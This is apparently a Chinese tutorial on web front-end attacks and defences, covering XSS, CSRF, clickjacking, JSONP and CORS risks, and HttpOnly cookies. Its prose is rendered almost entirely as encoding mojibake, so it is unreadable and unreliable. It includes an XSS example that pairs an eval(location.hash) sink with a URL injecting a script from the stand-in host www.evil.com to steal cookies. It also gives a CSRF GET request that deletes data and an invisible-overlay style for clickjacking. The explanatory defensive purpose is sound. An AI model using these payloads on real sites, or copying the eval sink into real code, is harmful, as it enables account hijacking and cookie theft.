ǰÑÔ
Ëæ×ÅÍøÂçµÄ¿ìËÙÆÕ¼°£¬ÍøÂ簲ȫÎÊÌâµÄÊܺ¦Õß²»ÔÙÖ»ÊÇÕþ¸®¡¢ÆóÒµµÈ¼¯Ì壬ÿһ¸ö½Ó´¥ÍøÂçµÄÆÕͨÈ˶¼ÓпÉÄܳÉÎªÍøÂç¹¥»÷µÄÊܺ¦Õß¡£Ëæ×ÅÍøÂçµÄÆÕ¼°£¬ºÚ¿Í½øÐÐÍøÂç¹¥»÷µÄÊÖ¶ÎÔ½À´Ò²¶à£¬Ô½À´Ô½¸´ÔÓ¡£ÒÔÍøÕ¾µÄ¹¥»÷ΪÀý£¬¾Ý¹ú¼Ò¼ÆËã»úÍøÂçÓ¦¼±¼¼Êõ´¦Àíе÷ÖÐÐĵÄͳ¼Æ£¬Ò»ÄêÖÐÎå¸öÕþ¸®ÍøÕ¾Àï¾Í»áÓÐÒ»¸ö±»ÈëÇÖ£¬¶øÇÒÈëÇÖµÄÊýÁ¿Ã¿Äê¶¼ÔÚÒÔÁ½±¶¶àµÄËÙ¶ÈÔö¼Ó¡£ÍøÂç¹¥»÷µÄÊýÁ¿Ôö¼Ó£¬³ýÁ˹¥»÷ÕßµÄÊýÁ¿ºÍ¹¥»÷ˮƽµÄÔö¼ÓÖ®Í⣬ºÜ¶àÍøÂç·þÎñÆ÷¶Ë·À»¤Ë®Æ½µÍÒ²Öú³¤ÁËÍøÂçµÄ¹¥»÷¡£×î½ü¼¸Ä꣬ºÜ¶àÍøÕ¾µÄ°²È«Â©¶´Ôì³ÉÁËÓû§¸öÈËÐÅÏ¢µÄй¶£¬ºÜ¶àÆÕͨÓû§Êܵ½Á˾¼ÃÉϵÄËðʧ¡£ÔÚ¹úÄÚÖøÃûµÄ©¶´±¨¸æÆ½Ì¨-ÎÚÔÆÍø
ÉÏ£¬»á³ÖÐø±¨¸æºÜ¶àµÄÍøÂç©¶´¡£´ÓÍøÕ¾ÉϹ«¿ªµÄ©¶´±¨¸æ¿ÉÒÔ¿´³ö£¬¼´Ê¹ÊÇ´óµÄ¡¢ÓпƼ¼ÊµÁ¦µÄÍøÂç·þÎñÉÌ£¬ÔÚÆäÌṩµÄÍøÂç²úÆ·ÖÐÒ²¾³£»á´æÔÚÖÂÃüµÄ©¶´¡£¿É¼û¹úÄÚµÄÍøÂ簲ȫÎÊÌâºÜÍ»³ö¡£ºÚ¿Í¹¥»÷ÍøÕ¾µÄÖ÷ÒªÊÖ¶ÎÓÐSQL×¢Èë¡¢ÍøÂçµöÓã¡¢¿çÕ¾¹¥»÷¡¢¾Ü¾ø·þÎñ¹¥»÷µÈ¡£µ±È»£¬ÍøÕ¾µÄά»¤ÕßÒ²Óкܶà·À·¶µÄÊֶΣ¬±ÈÈç¹¹½¨Ç¿´óµÄ·À»ðǽµÈ¡£Ö»ÊÇ£¬Ö»ÓÐÍøÕ¾±¾Éí¾ßÓи߰²È«ÐÔ£¬²ÅÄܸüºÃµØµÖµ²¸÷ÖÖ¸´ÔӵĹ¥»÷£¬¶øÕâ¾ÍÒªÇóÍøÕ¾µÄ¿ª·¢ÕßÔÚ¿ª·¢ÍøÕ¾Ê±×ñÑÒ»¶¨µÄ°²È«¹æ·¶ÁË¡£
´ÓÍøÕ¾µÄǰºó¶ËµÄ½Ç¶ÈÀ´Ëµ£¬ºó¶ËÊǰ²È«·À·¶µÄÖØÖÐÖ®ÖØ£¬ÍøÕ¾µÄºó¶Ë³ÐÔØ×ÅÍøÕ¾ÖеÄÖØÒªÐÅÏ¢£¬±ÈÈçÓû§Õ˺š¢ÃÜÂëÐÅÏ¢¡¢ÐÅÓÿ¨µÈ£¬ÒÔ¼°ÆäËûÖØÒªÐÅÏ¢¡£ÕâЩÐÅÏ¢Êǹ¥»÷Õß×îÏ£ÍûµÃµ½µÄÐÅÏ¢¡£µ«ÊÇÓÉÓÚǰ¶ËÒµÎñÂß¼Ô½À´Ô½¶à£¬Ô½À´Ô½¸´ÔÓ£¬Õë¶Ôǰ¶ËµÄ¶ñÒâ¹¥»÷Ò²Ô½À´Ô½¶àÁË¡£Ç°¶ËµÄHTML¡¢JavaScript¡¢CSS¡¢FlashµÈ¼¼Êõ±ä³ÉÁËǰ¶Ë¹¥»÷ÕߺͿª·¢ÕßµÄÕ½³¡£¬ÍøÕ¾°²È«ÎÊÌâÒ²¿ªÊ¼Ïòǰ¶ËÇãб¡£
³£¼ûµÄWebǰ¶Ë¹¥»÷·½Ê½
Òª¸ãÇå³þÈçºÎ·À·¶Webǰ¶Ë¹¥»÷£¬Ê×ÏÈÒªÁ˽ⳣ¼ûµÄWebǰ¶Ë¹¥»÷Êֶλò·½·¨¡£Ä¿Ç°£¬¹¥»÷ÍøÕ¾Ç°¶ËµÄÖ÷Òª·½Ê½ÓÐÈçϼ¸ÖÖ£º
1. XSS
XSSÊÇCross Site ScriptingµÄËõд£¬¼´¿çÕ¾µã½Å±¾¹¥»÷¡£XSS·¢ÉúÔÚÓû§µÄä¯ÀÀÆ÷¶Ë£¬¼´µ±Óû§ÔÚ¼ÓÔØHTMLÎĵµÊ±Ö´ÐÐÁË·ÇÔ¤ÆÚµÄ¶ñÒâ½Å±¾¡£ÕâЩ¶ñÒâµÄ½Å±¾Ò»°ãÀ´×ÔÓÚµÚÈý·½Óò£¬´øÓÐÒ»¶¨µÄΣº¦ÐÔ£¬¶ñÒâ½Å±¾µÄÖ´ÐлᵼÖÂÓû§Ãô¸ÐÊý¾ÝµÄй¶»òÕßÓÕµ¼Óû§´íÎó²Ù×÷¡£ä¯ÀÀÆ÷µÄͬԴ²ßÂÔ²¢Ã»ÓÐÏÞÖÆÒ³ÃæÖмÓÔØµÚÈý·½µÄ½Å±¾£¬ËùÒÔ¸øÁ˹¥»÷ÕßһЩ¿É³ËÖ®»ú¡£Ò»¸öµäÐ͵ݸÀýÊÇÕâÑùµÄ£¬¹¥»÷Õß·¢ÏÖµ½ÍøÕ¾ÖÐÓÐ×¢Èë½Å±¾µÄ©¶´£¬±ÈÈçûÓÐÕë¶ÔÓû§ÊäÈëµÄÄÚÈÝ×÷ÑéÖ¤»òתÒ壬¶øÊÇÖ±½ÓÔÚÒ³ÃæÉÏÏÔʾÁËÊäÈëµÄÄÚÈÝ£¬ÓÚÊÇËûÃǶñÒâÊäÈëÒ»¶ÎÓй¥»÷ÐԵĽű¾£¬Ê¹ÆäÔÚÒ³ÃæÉÏÖ´ÐС£ÕâЩ¶ñÒâ½Å±¾»áÐÞ¸ÄÒ³ÃæµÄÄÚÈÝ£¬²¢ÓÕµ¼Óû§²Ù×÷ÒѾ±»Ð޸ĹýµÄÒ³Ãæ£¬´Ó¶øµÁÈ¡Óû§µÄCookieÐÅÏ¢¡£ÈçϵĴúÂëÑÝʾÁËÒ»¸öµäÐ͵ÄXSS¹¥»÷¡£
Èç¹ûÍøÕ¾µÄǰ¶Ë´úÂëÖÐÓÐÈçϵĴúÂë¶Î£º
<script> eval(location.hash.substr(1)); </script> |
¹¥»÷Õß·¢ÏÖÒ³ÃæÉÏÓÐÕâÑùµÄ´úÂ룬Ôò¿ÉÒÔ¹¹½¨ÈçϵÄURL£º
http://host/test.html#document.write("<script/src=//www.evil.com/evil.js></script>¡±) |
ÒÔÕâÑùµÄ·½Ê½£¬¹¥»÷ÕßÔÚÄ¿±êÍøÕ¾ÉϾÍ×¢ÈëÁËÒ»¸öÍⲿµÄJavaScriptÎļþ£¬Èç¹û¹¥»÷ÕßÔÚÕâ¸öÍⲿÎļþÖбàд¶ñÒâµÄ´úÂ룬±ÈÈçÈ¡µÃCookieÐÅÏ¢µÈ£¬¾Í¿É¿ØÖÆÓû§ÔÚ±»¹¥»÷ÍøÕ¾ÉϵÄÕ˺ÅȨÏÞÁË¡£
×ܽáXSS¹¥»÷µÄÌØµã¾ÍÊÇ£º¾¡Ò»Çа취ÔÚÄ¿±êÍøÕ¾ÉÏÖ´ÐзÇÄ¿±êÍøÕ¾ÉÏÔÓеĽű¾¡£
2. CSRF
CSRFÊÇCross Site Request Forgery£¬·ÒëΪ¿çÕ¾ÇëÇóαÔì¡£CSRFµÄ¸ÅÄîºÜÈÝÒ׺ÍXSS»ìÏý¡£CSRFºÍXSS¹¥»÷¶¼ÊÇ·¢Æð¸÷ÖÖÇëÇ󣬵«¶ÔCSRFÀ´Ëµ£¬ÇëÇóÊÇÀ´Ô´ÓÚÆäËûÍøÕ¾µÄ£¬¼´Îª¿çÕ¾µÄÇëÇó¡£²¢ÇÒÕâ¸öÇëÇó²¢²»ÊÇÀ´×ÔÓÚÓû§µÄÒâÔ¸£¬¶øÊÇαÔìµÄÇëÇó£¬ÓÕµ¼Óû§·¢ÆðµÄÇëÇó¡£ÈçÏÂÊÇÒ»¸öCSRF¹¥»÷µÄµäÐ͹ý³Ì¡£
¼ÙÉèÍøÕ¾aÓиöÒ³ÃæÊÇͨ¹ýGETÇëÇóÀ´É¾³ýÊý¾ÝµÄ£¬Ê¹ÓõÄURLÈçÏ£º
http://www.a.com/del?id=21 |
¹¥»÷Õ߾ͿÉÒÔÀûÓÃÕâÒ»µã£¬¹¹½¨Ò»¸öÒ³Ãæ²¢´´½¨Ò»¸öÖ¸Ïò´ËÁ´½ÓµÄiframe¡¢img»òÕßscriptµÈ±êÇ©¡£Ï൱ÓÚαÔìÁËÒ»¸öGETÇëÇó¡£
´Ëºó£¬¹¥»÷Õß°Ñй¹½¨Ò³ÃæµÄµØÖ··¢²¼³öÈ¥£¬Ìí¼ÓһЩÎüÒýÑÛÇòµÄÏûÏ¢£¬ÓÕÆÄ¿±êÓû§´ò¿ª´ËÒ³Ãæ¡£Óû§´ò¿ª´ËÒ³Ãæ¾ÍÏ൱ÓÚ¼ä½ÓµØÍê³ÉÁËɾ³ýÊý¾ÝµÄ²Ù×÷¡£
¿ÉÒÔ¿´µ½Õâ¸öCSRF¹¥»÷µÄ¹ý³ÌÃ÷ÏÔ²»Í¬ÓÚXSS¹¥»÷£¬Õâ¸ö¹¥»÷¿ÉÒÔûÓÐÈκεÄJavaScript²ÎÓë¡£µ±È»£¬Èç¹ûÏëÒªÀûÓÃJavaScript½Å±¾´úÂëÒ²ÊÇ¿ÉÒԵ쬱ÈÈçÀûÓÃJavaScript´úÂëÀ´¶¯Ì¬¹¹½¨form±íµ¥£¬²¢·¢ÆðÒ»¸öÕë¶ÔÄ¿±êÍøÕ¾µÄPOSTÇëÇ󣬴Ӷø´ïµ½¹¥»÷Ä¿±êÍøÕ¾µÄÄ¿µÄ¡£
3. ½çÃæ²Ù×÷½Ù³Ö
½çÃæ²Ù×÷½Ù³ÖÊÇ×î½ü¼¸Äê²ÅÐËÆðµÄWebǰ¶Ë¹¥»÷·½Ê½£¬Twitter¡¢FacebookµÈ´óÐÍÍøÕ¾¶¼Êܵ½¹ý´ËÀàµÄ¹¥»÷¡£´ÓÓû§²Ù×÷ÐÐΪÉÏ¿ÉÒ԰ѽçÃæ²Ù×÷½Ù³Ö·ÖΪµã»÷½Ù³ÖºÍÍϷŽٳÖÁ½ÖÖ£¬ÕâÁ½ÖÖ½Ù³ÖµÄÐÎʽ´Ó×ÖÃæÉϺܺÃÀí½â£¬·Ö±ðÊÇÔÚÓû§µã»÷ºÍÍ϶¯²Ù×÷ʱ·¢ÉúµÄ½Ù³Ö¹¥»÷ʼþ¡£
½çÃæ²Ù×÷½Ù³ÖÊÇÀûÓÃÊÓ¾õÆÛÆ£¬ÓÕµ¼Óû§²Ù×÷¡£±ÈÈçÔڿɼûµÄÊäÈë¿òÖи²¸ÇÒ»¸ö²»¿É¼ûµÄ¿ò£¨ÈçÒ»¸ö²»¿É¼ûµÄiframe£©£¬Óû§µã»÷ÊäÈë¿òʱ£¬ÆäʵÊǵã»÷Á˲»¿É¼û¿òÖеÄÄÚÈÝ£¬´Ó¶øÈÃÓû§×ö³öÁËһЩ·Ç×Ô¼ºÒâÔ¸µÄ²Ù×÷¡£ÕâЩ²Ù×÷ÓпÉÄÜÔì³ÉÁËÓû§Ãô¸ÐÐÅÏ¢µÄй¶¡¢Êý¾Ý¶ªÊ§µÈºó¹û¡£
ʹÓÃǰ¶Ë¼¼ÊõºÜÈÝÒ×ʵÏÖÒ»¸ö²»¿É¼ûÇÒ¸¡ÔÚ×îÉϲãµÄiframe´°¿Ú£¬ÈçϵÄÑùʽ´úÂëչʾÁËÆä¾ßÌåµÄʵÏÖ£º
filter:alpha(opacity=0); opacity:0; z-index: 100; |
ÉÏÊö´úÂëÉèÖÃÁË´°¿ÚµÄ͸Ã÷¶ÈΪ0£¬¼´´°¿ÚÍêȫ͸Ã÷£¬¼ÙÉèÒ³ÃæÖÐËùÓеÄÔªËØÉèÖõÄz-indexÑùʽ¶¼±È100С£¬Ôòz-indexΪ100µÄiframe´°¿Ú¾Í»á¸¡µ½Ò³ÃæµÄ×îÉϲ㣬Òâζ×ÅÒ³ÃæÉϵÄÊó±ê²Ù×÷Ê×ÏÈ»á²Ù×÷µ½iframe´°¿ÚÀïÃæµÄÄÚÈÝ£¬¾¡¹Ü²Ù×÷ÕßÒÔΪ²Ù×÷µÄÊÇiframe´°¿Ú¸²¸ÇµÄÇøÓò£¬¼´ÊµÏÖÁËÊÓ¾õÉÏµÄÆÛÆ¡£ËùÒÔ½çÃæ²Ù×÷½Ù³Ö²¢²»ÊǾßÓи߼¼Êõº¬Á¿µÄ¹¥»÷·½Ê½£¬Ò»°ãͨ¹ýÉè¼Æ×ã¹»ÎüÒýÓû§²Ù×÷µÄÒ³Ãæ¾Í¿ÉÒÔÁË¡£
ÒÔÉϾÍÊÇĿǰ³£¼ûµÄÈýÖÖÕë¶Ôǰ¶ËÒ³Ãæ¹¥»÷µÄÊֶΣ¬ËäȻǰ¶ËÒ³Ãæ³ÉΪÁËWeb¹¥»÷µÄÖ÷ÒªÈë¿ÚÖ®Ò»£¬µ«Ç°¶Ë¿ª·¢ÕßÕë¶ÔÕâЩ¹¥»÷µÄ·À·¶»¹Ô¶Ô¶²»¹»£¬·À·¶ÒâʶҲºÜµ±¡¡£ÄÇôÎÒÃÇÓ¦¸ÃÈçºÎ·À·¶ÄØ£¿
ÈçºÎ·À·¶Webǰ¶Ë¹¥»÷
1. ²»ÒªÐÅÈÎÈκÎÍⲿ´«ÈëµÄÊý¾Ý
·À·¶Webǰ¶Ë¹¥»÷µÄÒ»¸öÖØÒªµÄ³£Ê¶ÊÇ£ºÓÀÔ¶Ò²²»ÒªÏàÐÅÓû§ÊäÈëµÄÊý¾Ý£¬Ò»¶¨ÒªÕë¶ÔÓû§ÊäÈë×÷Ïà¹ØµÄ¸ñʽ¼ì²é¡¢¹ýÂ˵ȲÙ×÷£¬·ÀÖ¹ÈκοÉÄܵÄǰ¶Ë×¢Èë¡£ÈçÏÂËùÁеÄÊÇÔÚǰ¶Ë¿ª·¢ÖÐÓ¦ÓõľßÌåʵ¼ù·½·¨¡£
²»ÒªÐÅÈÎÓû§ÊäÈëµÄÄÚÈÝ
´ó²¿·ÖµÄÍøÕ¾Öж¼ÓкÍÓû§ÊäÈë½»»¥£¬»òÕßÊÇͨ¹ýURL´«µÝÊäÈëµÈ¹¦ÄÜÄ£¿é´æÔÚ£¬ÕâЩÊäÈëµÄÈë¿Ú£¬Ò²¸øÁ˹¥»÷Õ߿ɳËÖ®»ú£¬XSS¹¥»÷¾ÍÊÇÀûÓÃÕâЩÈë¿ÚÀ´¹¥»÷ÍøÕ¾µÄ¡£Ô¤·À¹¥»÷µÄ·½Ê½Æäʵ²¢²»¸´ÔÓ£¬Ö»ÒªÔÚËùÓеÄÕâЩÈë¿ÚÌí¼Ó±ØÒªµÄÊäÈëУÑéºÍ¹ýÂ˼´¿É¡£¾ßÌåÀ´Ëµ£¬¾ÍÊÇÕë¶ÔÓû§ÊäÈëÄÚÈݽøÐÐhtml±àÂë¡¢html±êÇ©ÊôÐÔ±àÂë¡¢JavaScript±àÂë¡¢CSS±àÂë¡¢URL±àÂë¡£
Èç¹ûÏîÄ¿ÖÐʹÓÃÁËjQuery¿ò¼Ü£¬ÄÇôÒÔÉϵıàÂë¹ýÂ˲Ù×÷¾Í»á±äµÃ¼òµ¥¶àÁË£¬jQueryÄÚÖõÄDOM²Ù×÷½Ó¿ÚÒѾÕë¶ÔÊäÈëµÄÄÚÈÝ×÷ÁËÏàÓ¦µÄ±àÂë´¦Àí£¬±ÈÈ磬ÏÔʾÓû§ÊäÈëµÄÄÚÈÝʱʹÓÃ$('...').text(data)¶ø·Ç$('...').html(data)¡¢Ê¹ÓÃ$('...').attr()Ìí¼ÓÊôÐÔ¡¢Ê¹ÓÃ$('...').css()Ìí¼ÓÑùʽµÈ¡£ÖÁÓÚURL±àÂ룬ÔòÖ±½ÓʹÓÃÔÉúº¯ÊýencodeURL¡£
Èç¹ûÆÚÍû¸üÁé»îµØ¿ØÖÆÊäÈëÄÚÈÝ£¬Ôò¿ÉÒÔʹÓÃjQuery²å¼þjqencoder¡£ÈçÏÂÊǴ˲å¼þÌṩµÄ¸÷ÖÖ±àÂë½Ó¿Ú£º
$.encoder.encodeForHTML() $.encoder.encodeForHTMLAttribute() $.encoder.encodeForJavaScript() $.encoder.encodeForCSS() $.encoder.encodeForURL() |
³ýÁ˱ØÒªµÄÊý¾Ý¼ì²é¹ýÂËÖ®Í⣬ҲӦ¸Ã¾¡Á¿±ÜÃâʹÓÃһЩÓа²È«Òþ»¼µÄº¯Êýµ÷Ó÷½Ê½£¬±ÈÈç±ÜÃâʹÓÃeval¡¢setInterval¡¢setTimeoutµÈº¯ÊýÖ±½ÓÔËÐÐÊäÈëµÄÄÚÈÝ¡£
²»ÒªÐÅÈÎÔÚÈκδ«ÈëµÄµÚÈý·½Êý¾Ý
ÔÚǰ¶Ë¿ª·¢Éè¼ÆÖУ¬¾³£»á¼ÓÔØµÚÈý·½´«ÈëµÄÊý¾Ý¡£µ«ÓÉÓÚä¯ÀÀÆ÷ͬԴ²ßÂÔµÄÏÞÖÆ£¬JavaScriptÊDz»ÄÜÖ±½Ó¼ÓÔØµÚÈý·½ÓòµÄÊý¾ÝµÄ£¬²»¹ý£¬Óм¸ÖÖ³£Óõļ¼Êõ¿ÉÒÔÈÆ¹ýÕâÑùµÄÏÞÖÆ¡£ÆäÖУ¬´«Í³µÄ·½Ê½ÊÇͨ¹ýʹÓÃJSONP
£¬ÕâÏî¼¼ÊõÀûÓÃÁËä¯ÀÀÆ÷¿ÉÒÔ¼ÓÔØµÚÈý·½JavaScript½Å±¾µÄÌØÐÔ¡£¼ÙÉèAÍøÕ¾ÇëÇóBÍøÕ¾µÄÊý¾Ý£¬ÔòA»áÔÚÒ³ÃæÖÐͨ¹ýscript±êÇ©ÇëÇóBÍøÕ¾µÄÒ»¸ö½Å±¾Îļþ£¬²¢ÔÚÎļþµÄURLÖд«ÈëÒ»¸ö»Øµ÷º¯ÊýÃû£¬BÍøÕ¾ÊÕµ½ÇëÇóºó»á°ÑÒª´«ÊäµÄÊý¾ÝºÍAÍøÕ¾´«ÈëµÄ»Øµ÷º¯Êý×éºÏΪһ¸öº¯Êýµ÷ÓôúÂë·µ»Ø¸øAÍøÕ¾£¬´«ÊäµÄÊý¾ÝÔò×÷Ϊ»Øµ÷º¯ÊýµÄ²ÎÊý¡£AÍøÕ¾ÒýÓýű¾µÄ·½Ê½ÀàËÆÈçÏ£º
<script src="http://server2.example.com/RetrieveUser?UserId=1823&jsonp=parseResponse"> </script> |
ÉÏÊö´úÂëÖÐparseResponseΪ´«ÈëµÄ»Øµ÷º¯ÊýÃû³Æ£¬BÍøÕ¾×éºÏºó·µ»ØµÄ´úÂëÀàËÆÈçÏ£º
parseResponse({"Name": "Cheeso", "Id" : 1823, "Rank": 7}) |
ÒÔÉÏʾÀý´úÂëÀ´×ÔÓÚJSONP¶ÔÓ¦µÄά»ù°Ù¿ÆÒ³Ãæ¡£JSONPËäÈ»ºÜÇÉÃîµØ×öµ½ÁË¿çÓòµÄÊý¾Ý´«Ê䣬µ«ÕâÖÖ·½Ê½Ò²´æÔÚ°²È«Òþ»¼¡£Õý³£Çé¿öϵÚÈý·½ÍøÕ¾´«Ê䏸»Øµ÷º¯ÊýµÄÊý¾ÝΪJSON¸ñʽ£¬µ«Èç¹ûµÚÈý·½ÍøÕ¾Êܵ½¹¥»÷£¬Ê¹µÃÆä·µ»ØµÄÊý¾Ý°üº¬ÓжñÒâ´úÂ룬¶ø²»ÊÇÕý³£µÄJSON¸ñʽÊý¾Ý£¬ÄÇôִÐÐÕâЩ·µ»ØµÄ¶ñÒâ´úÂë¾Í»áµ¼Ö²»¿ÉÔ¤ÆÚµÄ¹¥»÷¡£ËùÒÔÈç¹ûÍøÕ¾ÖÐʹÓÃÁËJSONP¼¼Êõ£¬ÔòÒ»¶¨Òª¼ì²é´ÓµÚÈý·½·µ»ØµÄÊý¾Ý¸ñʽ¡£ÑéÖ¤·½·¨ºÜ¼òµ¥£¬ÑéÖ¤·µ»ØÊý¾ÝµÄÊôÐÔÃûÊÇ·ñΪԤÆÚµÄÃû³Æ£¬ÑéÖ¤ÊôÐÔÖµÊÇ·ñÔÚÔ¤ÆÚµÄ·¶Î§ÄÚ¡£Êý¾ÝÌṩ·½£¨µÚÈý·½£©¸üÈÝÒ×»áÊܵ½¶ñÒâµÄ¹¥»÷£¬±ÈÈçͨ¹ý¹¹Ôì·Ç·¨µÄcallbackº¯ÊýÃûÀ´´ïµ½XSS¹¥»÷µÄÄ¿µÄ¡£·À·¶µÄ°ì·¨ÊǹýÂËcallbackº¯ÊýÃûÖеķǷ¨×Ö·û¡£Í¬Ê±£¬Ò²Òª·ÀÖ¹Õë¶ÔÊý¾ÝÌṩ·½µÄ´óÁ¿¶ñÒâÇëÇó¹¥»÷£¬¼´DdoS¹¥»÷
¡£ÕâÖÖ¹¥»÷µÄÊÖ¶ÎÊÇÀûÓúÏÀíµÄ·þÎñÇëÇóÀ´Õ¼Óùý¶àµÄ·þÎñ×ÊÔ´¡£½â¾öµÄ°ì·¨ÊÇÀûÓð×Ãûµ¥»òÕßCookie TokenÀ´×÷ÏÞÖÆ¡£Ò»¸ö¸ü°²È«µÄ·½Ê½ÊÇʹÓÃбê×¼HTML5ÖÐÒýÈëµÄCORS£¬ÕâÏî¼¼ÊõÔÚ¹úÄÚ»¹ºÜÉÙʹÓ㬵«ÔÚ¹úÍâʹÓõÄÀý×ÓÒѾÓкܶàÁË¡£JSONP¼¼ÊõÌṩµÄ¿çÓòÊý¾Ý·ÃÎÊ×êÁËͬԴ²ßÂԵĿÕ×Ó£¬ËãÊǼ¼ÇÉÐԵķ½°¸£¬¶øCORSÔòÊǴӹ淶ÉÏרÃŶ¨ÒåµÄÒ»Ïî¿çÓòÊý¾Ý·ÃÎʵļ¼Êõ¡£CORS±ÈJSONP¸üÏȽøºÍ¿É¿¿£¬²¢ÇÒÒѾµÃµ½ÁËÖ÷Á÷ä¯ÀÀÆ÷µÄÖ§³Ö¡£JSONPÖ»ÄÜÓÃGETÇëÇ󣬶øCORS²»ÊÜÕâÑùµÄÏÞÖÆ£¬ÉõÖÁ¿ÉÒÔͨ¹ýAJAX·¢ÆðÇëÇó¡£CORSÖ÷ÒªµÄÔÀíÊÇÔÚ·þÎñÆ÷¶ËÉèÖÃAccess-Control-Allow-OriginÍ·£¬´Ó¶øÏÞ¶¨ÁË·þÎñÇëÇóµÄ·¢Æð¶Ë¡£ÈçÏÂÊÇÒ»¸öÉèÖõÄʾÀý£º
Access-Control-Allow-Origin: http://www.dang-jian.com |
´ËÉèÖÃÒâζ×Å´Ówww.dang-jian.comÍøÕ¾·¢ÆðµÄ¿çÓòÇëÇó»áµÃµ½ÔÊÐí¡£CORSËäÈ»±ÈJSONP¸ü¿É¿¿£¬µ«ÊÇÒ²Òª×ñÊØÒ»Ð©°²È«µÄ¹æ·¶¡£±ÈÈ磬Access-Control-Allow-OriginÍ·Ó¦¸ÃÉèÖÃÔÚ×îСµÄ·¶Î§ÄÚ£¬¾¡Á¿²»ÒªÉèÖÃΪ*£¬¼´ÔÊÐíËùÓеĿçÓòÇëÇó¡£Êý¾Ý½ÓÊÕ·½ÔÚ½ÓÊܵ½Êý¾Ýºó£¬Ò»¶¨Òª½øÐбØÒªµÄÊý¾Ý¸ñʽºÍÍêÕûÐÔУÑ飬²¢°Ñ·µ»ØµÄÄÚÈÝ×÷ΪÊý¾Ý¶ø²»ÊÇ´úÂ룬´Ó¶ø±ÜÃâ¶ñÒâÊý¾ÝµÄ¹¥»÷¡£
HTML5¹æ·¶ÖÐÒ²ÒýÈëÁËÁíÍâÒ»¸ö¿çÓòÊý¾Ý´«ÊäµÄ·½°¸£¬¼´Ê¹ÓÃwindow.postMessage½Ó¿Ú¡£Ê¹ÓÃʾÀýÈçÏ£º
popup.postMessage("ÕâÊÇ´«ÊäµÄÊý¾Ý", "https://secure.example.net"); È»ºóÔÚÄ¿±êÒ³ÃæÖÐÌí¼ÓÈçϵĴúÂ룺 function receiveMessage(event) { if (event.origin !== "http://example.org") { return // event.source Ö¸Ïòpopup // event.data µÄÄÚÈÝÊÇ "ÕâÊÇ´«ÊäµÄÊý¾Ý" } }
window.addEventListener("message", receiveMessage, false);
|
µ±Êý¾ÝÔ´ÍøÒ³µ÷ÓÃpostMessage½Ó¿Ú·¢ËÍÊý¾Ýµ½Ä¿±êÒ³ÃæÊ±£¬Ä¿±êÍøÒ³µÄmessageʼþ±»´¥·¢£¬²¢ÔÚʼþ¶ÔÏóeventÉϰüº¬ÁË´«ÊäµÄÊý¾Ý¡£Ê¹ÓÃpostMessageʱÐèҪעÒâµÄµØ·½ºÍʹÓÃCORSʱµÄÀàËÆ£¬ÉèÖÃÊý¾Ý½ÓÊÜ·½Ê±²»ÒªÉèÖÃΪ*ºÅ£¬Ó¦ÉèÖÃÎªÌØ¶¨µÄµØÖ·¡£Í¬Ê±£¬Êý¾Ý½ÓÊÕ·½Ó¦¸Ã¼ì²éÊý¾ÝÀ´Ô´µØÖ·²¢Ð£Ñé½ÓÊܵÄÊý¾Ý¡£²»ÒªÍ¨¹ý¿çÓòÀ´´«Êä´úÂ룬±ÜÃâ¶ñÒâ´úÂëµÄÖ´ÐС£Èç¹ûÍøÕ¾²»ÐèÒª½ÓÊÜÈκÎÊý¾Ý£¬Ôò²»Òª°ó¶¨messageʼþ¡£
ÒÔÉÏÕ⼸ÖÖ·À·¶¿çÕ¾¹¥»÷µÄÊÖ¶Î×îÊʺÏÓÃÓÚÍøÕ¾Ìṩ¶ÔÍâ½Ó¿ÚµÄÇéÐΣ¬Èç¹ûÍøÕ¾²»Ìṩ¶ÔÍâ½Ó¿Ú£¬Ôò·À·¶°ì·¨¾Í²»ÓÃÄÇôÂé·³ÁË£¬ÓÐһЩ³£¹æÊֶοÉÒÔʹÓᣱÈÈçÿ´ÎÇëÇó¶¼¶îÍâÌí¼Óǰºó¶Ë¶¼Ô¼¶¨ºÃ¼ÓÃÜtoken¡£ÕâÑùµÄ²å¼þÓкܶ࣬Ҳ¿ÉÒÔ×Ô¼ºÊµÏÖ¡£Èç¹ûÏîÄ¿ÊÇ»ùÓÚNodeJSºÍExpress£¬ÔòÍÆ¼öʹÓÃcsurfÖмä¼þ£¬Õâ¸öÖмä¼þרÃÅÓÃÓÚ·À·¶CSRF¹¥»÷£¬¿ÉÒԲ鿴Æä¹Ù·½ÍøÕ¾»ñµÃ¸ü¶àÐÅÏ¢¡£
²»Òª½ö½ö¿¿JavaScript´úÂëÀ´×èÖ¹×¢Èë
Èç¹ûÓû§ÊäÈëµÄÊý¾ÝÒª±£´æµ½ºó¶ËÊý¾Ý¿âÖУ¬Ôò½ö½öÒÀ¿¿JavaScript´úÂëÀ´Ð£ÑéÓû§ÊäÈëµÄÊý¾ÝÊDz»¹»µÄ¡£ÒòΪJavaScript´úÂë±¾ÉíÌ«ÈÝÒ×±»¹¥»÷ÕßÀ¹½ØºÍÐÞ¸ÄÁË£¬Óû§ÉõÖÁ¿ÉÒÔ²»Í¨¹ýÒ³Ãæ¶øÖ±½ÓºÍºó¶ËÁ¬½Ó£¬ËùÒÔÔÚºó¶ËµÄ´úÂëÖÐÒ²ÐèÒª½øÐбØÒªµÄÊý¾ÝУÑé²Ù×÷£¬²¢ÇÒ¼ì²éУÑéµÄÁ¦¶È±Èǰ¶ËÒª¸üÑϸñ¡£
2. ÆäËûǰ¶Ë°²È«·À·¶Êµ¼ù
¸ü°²È«µØÊ¹ÓÃCookie
ÔںܶàµÄÍøÕ¾ÖУ¬CookieÊÇÓÃÀ´³Ö¾Ã»¯Óû§ÔÚÍøÕ¾ÖеĵǼµÄ¡£ËùÒÔÈç¹ûÈ¡µÃÁËCookie¾Í¿ÉÒÔ½Ù³ÖÓû§ÔÚÍøÕ¾ÉϵÄȨÏÞ¡£Ç°¶ËXSS¹¥»÷µÄÆäÖÐÒ»¸öÄ¿±ê¾ÍÊÇÈ¡µÃCookieÐÅÏ¢£¬ÕâÒ²ÊÇCookieй¶µÄ×îÖ÷Òª·½Ê½¡£±ÜÃâÕâÖÖй¶µÄ×îÓÐЧ·½Ê½ÊÇÉèÖÃCookieΪHttpOnly£¬¼´½ûÖ¹ÁËJavaScript²Ù×÷Cookie£¬ÕâÑùÒ»À´£¬Ç°¶ËXSS¹¥»÷ʱ¾Í²»ÄÜͨ¹ýJavaScript»ñÈ¡CookieµÄÐÅÏ¢ÁË¡£HttpOnly
